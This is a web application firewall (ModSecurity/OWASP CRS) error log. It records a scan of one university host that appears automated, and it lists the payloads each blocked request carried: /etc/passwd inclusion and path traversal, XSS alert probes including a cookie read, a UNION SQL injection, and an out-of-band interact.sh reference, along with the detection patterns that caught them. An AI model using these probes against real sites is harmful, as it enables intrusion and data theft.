[Tue Aug 29 11:53:26.251913 2023] [:error] [pid 2609] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mbkm.unla.ac.id"] [uri "/wp-content/plugins/post-pdf-export/dompdf/dompdf.php"] [unique_id "ZO15xsCo-f0AAAox7GwAAAAN"]
[Tue Aug 29 11:53:26.879067 2023] [:error] [pid 2579] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mbkm.unla.ac.id"] [uri "/wp-content/plugins/blogtopdf/dompdf/dompdf.php"] [unique_id "ZO15xsCo-f0AAAoT7XwAAAAD"]
[Tue Aug 29 11:53:27.107948 2023] [:error] [pid 2583] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mbkm.unla.ac.id"] [uri "/wp-content/plugins/gboutique/library/dompdf/dompdf.php"] [unique_id "ZO15x8Co-f0AAAoXJxQAAAAP"]
[Tue Aug 29 11:53:27.775232 2023] [:error] [pid 2530] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mbkm.unla.ac.id"] [uri "/wp-content/plugins/wp-ecommerce-shop-styling/includes/dompdf/dompdf.php"] [unique_id "ZO15x8Co-f0AAAni-EkAAAAU"]
[Tue Aug 29 11:53:27.792221 2023] [:error] [pid 2582] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mbkm.unla.ac.id"] [uri "/wp-content/plugins/wp-swimteam/include/user/download.php"] [unique_id "ZO15x8Co-f0AAAoW7QMAAAAJ"]
[Tue Aug 29 11:53:28.055823 2023] [:error] [pid 2582] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:module. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:module: module\\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/mods/clansphere/lang_modvalidate.php"] [unique_id "ZO15yMCo-f0AAAoW7QYAAAAJ"]
[Tue Aug 29 11:53:28.813669 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:module. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:module: 'onm<a>ouseover=alert(document.domain)'\\x22tabindex=1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/module/"] [unique_id "ZO15yMCo-f0AAAoz72AAAAAS"]
[Tue Aug 29 11:53:28.827232 2023] [:error] [pid 2575] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:command. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x95\\x5c\\x8e\\xa6 found within ARGS:command: \\x95\\x5c\\x8e\\xa6"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/Solar_History.php"] [unique_id "ZO15yMCo-f0AAAoPubcAAAAM"]
[Tue Aug 29 11:53:30.554372 2023] [:error] [pid 2591] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchinput. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe2\\x80\\x9c/>< found within ARGS:searchinput: \\xe2\\x80\\x9c/><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/search-locker-details.php"] [unique_id "ZO15ysCo-f0AAAofm8QAAAAX"]
[Tue Aug 29 11:53:31.236479 2023] [:error] [pid 2602] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15y8Co-f0AAAoqbTgAAAAj"]
[Tue Aug 29 11:53:33.885677 2023] [:error] [pid 2609] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:layout_settings_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:layout_settings_id: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/wp-content/plugins/page-layout-builder/includes/layout-settings.php"] [unique_id "ZO15zcCo-f0AAAox7IEAAAAN"]
[Tue Aug 29 11:53:35.054473 2023] [:error] [pid 2579] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:expertise. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:expertise: Heart' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,md5('999999999'),NULL,NULL,NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/patient/search_result.php"] [unique_id "ZO15z8Co-f0AAAoT7ZkAAAAD"]
[Tue Aug 29 11:53:35.873464 2023] [:error] [pid 2608] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:layout. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:layout: /etc/resolv.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mbkm.unla.ac.id"] [uri "/"] [unique_id "ZO15z8Co-f0AAAowNrMAAAAH"]
[Tue Aug 29 11:53:36.845482 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:yuzo_related_post_css_and_style. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:yuzo_related_post_css_and_style: </style><script>alert(0);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/wp-admin/options-general.php"] [unique_id "ZO150MCo-f0AAAolKYIAAAAe"]
[Tue Aug 29 11:53:39.081754 2023] [:error] [pid 2608] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:</script><script>alert(document.domain)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:</script><script>alert(document.domain)</script>: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/"] [unique_id "ZO1508Co-f0AAAowNroAAAAH"]
[Tue Aug 29 11:53:41.837537 2023] [:error] [pid 2582] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:tag. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:tag: \\x22 onmouseover=alert(1)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO151cCo-f0AAAoW7TEAAAAJ"]
[Tue Aug 29 11:53:42.655312 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:itemid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:itemid: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/wp-content/plugins/pondol-formmail/pages/admin-mail-info.php"] [unique_id "ZO151sCo-f0AAAnHQtYAAAAT"]
[Tue Aug 29 11:53:42.662436 2023] [:error] [pid 2579] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:theme_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:theme_id: \\x22 onmouseover=alert(1)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO151sCo-f0AAAoT7acAAAAD"]
[Tue Aug 29 11:53:43.601086 2023] [:error] [pid 2605] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:gallery_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:gallery_id: 1\\x22 onmouseover=alert(1)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "mbkm.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO1518Co-f0AAAot8SwAAAAn"]
[Tue Aug 29 11:53:43.748525 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:toast. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:toast: </script><script>alert(document.cookie);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO1518Co-f0AAAoLfWkAAAAG"]
[Tue Aug 29 11:53:45.535681 2023] [:error] [pid 2633] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "mbkm.unla.ac.id"] [uri "/novius-os/admin/nos/login"] [unique_id "ZO152cCo-f0AAApJDTEAAAAY"]
[Tue Aug 29 11:53:45.564366 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:name: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/wp-content/plugins/alert-before-your-post/trunk/post_alert.php"] [unique_id "ZO152cCo-f0AAAolKZIAAAAe"]
[Tue Aug 29 11:53:45.672744 2023] [:error] [pid 2615] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:?script:setdb('snmp','syscontact'). [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:?script:setdb('snmp','syscontact'): \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/config/pw_snmp_done.html"] [unique_id "ZO152cCo-f0AAAo3IgkAAAAa"]
[Tue Aug 29 11:53:47.339767 2023] [:error] [pid 2575] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:id: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/wp-content/plugins/heat-trackr/heat-trackr_abtest_add.php"] [unique_id "ZO1528Co-f0AAAoPud0AAAAM"]
[Tue Aug 29 11:53:48.626506 2023] [:error] [pid 2635] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:return_url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:return_url: javascript:alert(document.domain)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "mbkm.unla.ac.id"] [uri "/"] [unique_id "ZO153MCo-f0AAApLWjkAAAAI"]
[Tue Aug 29 11:53:50.875350 2023] [:error] [pid 2575] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:url: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/wp-content/plugins/ultimate-weather-plugin/magpierss/scripts/magpie_debug.php"] [unique_id "ZO153sCo-f0AAAoPueoAAAAM"]
[Tue Aug 29 11:53:51.712281 2023] [:error] [pid 2605] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:from. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:from: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/index_en.php"] [unique_id "ZO1538Co-f0AAAot8UUAAAAn"]
[Tue Aug 29 11:53:52.888083 2023] [:error] [pid 2639] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:artname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:artname: <img src=1 onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "mbkm.unla.ac.id"] [uri "/product.php"] [unique_id "ZO154MCo-f0AAApPcuYAAAAa"]
[Tue Aug 29 11:53:52.980688 2023] [:error] [pid 2632] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:from. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:from: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO154MCo-f0AAApIdlQAAAAU"]
